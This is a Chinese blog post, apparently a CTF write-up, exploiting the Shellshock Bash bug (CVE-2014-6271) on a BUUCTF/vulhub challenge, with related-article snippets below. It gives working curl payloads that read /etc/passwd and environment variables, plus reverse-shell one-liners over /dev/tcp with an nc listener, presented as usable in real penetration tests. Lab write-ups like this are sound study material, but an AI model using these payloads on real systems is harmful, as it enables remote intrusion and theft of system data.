[Bash]Shellshock

最新推荐文章于 2023-01-03 14:26:21 发布
最新推荐文章于 2023-01-03 14:26:21 发布
阅读量307 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105786058
版权

#讲在前面
对于shellshock漏洞,还是必须要补充一些点的
网上对于这个漏洞的复现教程所剩无几,可能是因为破坏力实在太大,且易于实施。
2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难幸免。
#题目
image.png
#在vulhub上有该题的补充说明,知道有一个victim.cgi网页
image.png
使用curl -A 或者 -H 参数模拟Http头命令,并调用“cat /etc/passwd”读passwd文件,发送到存在Bash漏洞的docker容器,成功读取到了passwd文件内容。

curl -A "() { echo ShellShock; }; echo; /bin/cat /etc/passwd" http://node3.buuoj.cn:28253/victim.cgi

image.png
成功回显
如果是用bp来测试的话
修改http协议中的User-Agent字段为:
#() { :; };echo;/bin/cat /etc/passwd
效果是一样的,在此就不上图了
*对于实际渗透过程中,我们可以直接放反弹shell

curl -A "() { :; };echo;/bin/bash -i >& /dev/tcp/监听机IP/1234 0>&1" http://node3.buuoj.cn:28253/victim.cgi

然后起一个nc就欧克
nc -lvvp 1234

#对于这道题来说,启动不了反弹shell,没反应,可能是权限问题,那我们直接查看env就可以

curl -A "() { echo ShellShock; }; echo;/usr/bin/env" http://node3.buuoj.cn:28253/victim.cgi                                                                                                                         
HTTP_HOST=node3.buuoj.cn:28253

image.png
#!!!没有flag,直接cat /flag也一样,就是没有!一血就这么没了
image.png
疯狂吐槽赵总
image.png

浩歌已行
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shellshock 漏洞 bash漏洞rpm包升级包
09-28
研究人员周四发布警告称 黑客已经开始利用最新的“Shellshock”电脑漏洞 借助蠕虫病毒扫描有漏洞的系统 然后感染这些 redhat 6 5以上版本32 位64位 升级包
vulhub漏洞复现之bashShellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1242
Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
热门推荐
Exploit的小站~
05-10 3万+
 今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a comm...
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 452
Shellshock远程命令注入
bash(CVE-2014-6271) shellshock-破壳漏洞复现
weixin_45095113的博客
01-03 505
bash(CVE-2014-6271) shellshock-破壳漏洞复现
Shellshock Lab
Yuhan2001的CSDN博客
12-05 4074
软件安全课程实验二shellshock; 版本:SeedUbuntu20.04; 课本:计算机安全导论:深度实践;
Bash漏洞——Shellshock浅析.pdf
07-10
Bash漏洞——Shellshock浅析】 Bash漏洞,又称Shellshock,是指在2014年被发现的一个严重安全漏洞,它影响了广泛使用的Bash shell,这是一个在Unix-like操作系统,包括Linux和Mac OS X中的命令行解释器。这个漏洞...
Bash漏洞-Shellshock浅析.pdf
07-10
Bash漏洞-Shellshock浅析.pdf 学习资料 复习资料 教学资源
shellshock:Bash中的太空射击游戏
05-24
标题 "shellshock:Bash中的太空射击游戏" 提到的是一个使用Bash shell语言开发的太空射击游戏。在本文中,我们将深入探讨这个独特的概念,了解如何在命令行环境中创建游戏,以及它如何利用Bash的功能来实现这一目标...
shellshock补丁
10-20
破壳漏洞(shellshock)红帽4 X86(32位)补丁 内含: bash-3.0-27.0.3.el4.i386.rpm bash-debuginfo-3.0-27.el4.4.i386.rpm ------------------------------------------- 验证命令: env x='() { :;}; echo vulnerable'...
BUUCTF pwn 四月刷题
coco的博客
04-07 800
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
[BUUCTF-pwn] [HarekazeCTF2019]Ramen
weixin_52640415的博客
01-12 1026
看exp再慢慢消化。逻辑错造成的指针溢出。 这个题虽然有UAF但是利用起来很困难,本来不想看那么长的程序,没办法看程序再看了exp后才明白。 程序分主程序和order,serv,change 三个函数,主程序没啥内容,但是循环队列的指针v4放在这了。v4依次表示队列块指针,头id,尾id和总长度。 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int v3; // eax char v4[24]; //
shellshock-Attack-Lab
qq_49005782的博客
11-07 4017
shellshock Attack Lab 实验概述 实验背景 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样才能了解Shellshock 的脆弱性. 此次实验包括以下四个内容: Shellshock Environment variables Function definition in bash Apache and CGI programs 实验
Bash Shellshock CVE-2014-6271(破壳)
Hydra的博客
10-21 3742
Shell shell是一个程序,可以称为壳程序,用于用户与操作系统进行交互。 Shell 既是一种命令语言,又是一种程序设计语言。 Shell有很多中,这里列出其中几种 - Bourne SHell(sh) - Bourne Again SHell(bash) - C SHell(csh) - KornSHell(ksh) - zsh 运行shell脚本有两种办法: 1.作为可执行程序...
Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
Exploit的小站~
05-10 3万+
Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。 其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。 程序中的代理是我本地的goagent代理,端口是8087。如何...
Bash ShellShock 解决办法
a1895024的博客
10-13 448
2014 年 9 月 24 日,Bash 惊爆严重安全漏洞,编号为 CVE-2014-6271,该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell,广泛使用在 Linux 系统内,最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安...
关于ShellShock漏洞的利用过程和原理解析
pygain的博客
01-01 8548
0x00 今天本是应该休息和打LOL的日子,但是我那个敬业的舍友非要拿python写个跟Siri类似的东西。好吧我也来学习学习 晚上来研究下这个14年出现并且自家产品能防护住的漏洞---ShellShock 这是Bashshell中的一个漏洞,使得攻击者能在小于等于4.1版本的Bash上进行任意代码执行   实验环境:Centos 6.7 实验目的:获取root权限 0x
Bash(shellshock)
chocomoss的博客
11-30 230
影响 漏洞影响:GNU Bash <= 4.3 启动服务器 搭建:docker-compose up -d 查看:docker-compose ps 抵达网站 抓包拦截 User-Agent: () { :;};echo ; echo; echo $(/bin/ls /); 反弹shell:User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1; ...
ShellShock(破壳漏洞)的简单分析
爱唠叨的老鱼
09-27 1万+
(1)什么是ShellShock? (2)ShellShock漏洞的原理。 (3)ShellShock漏洞的危害。 (4)如何修复ShellShock漏洞。
shellshock漏洞利用
最新发布
04-03
Shellshock漏洞是一个存在于Bash(Unix和Linux操作系统的一种常用Shell)中的安全漏洞,它于2014年被公开。该漏洞允许攻击者通过构造恶意的环境变量来执行任意的命令,从而导致系统被入侵。 Shellshock漏洞的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值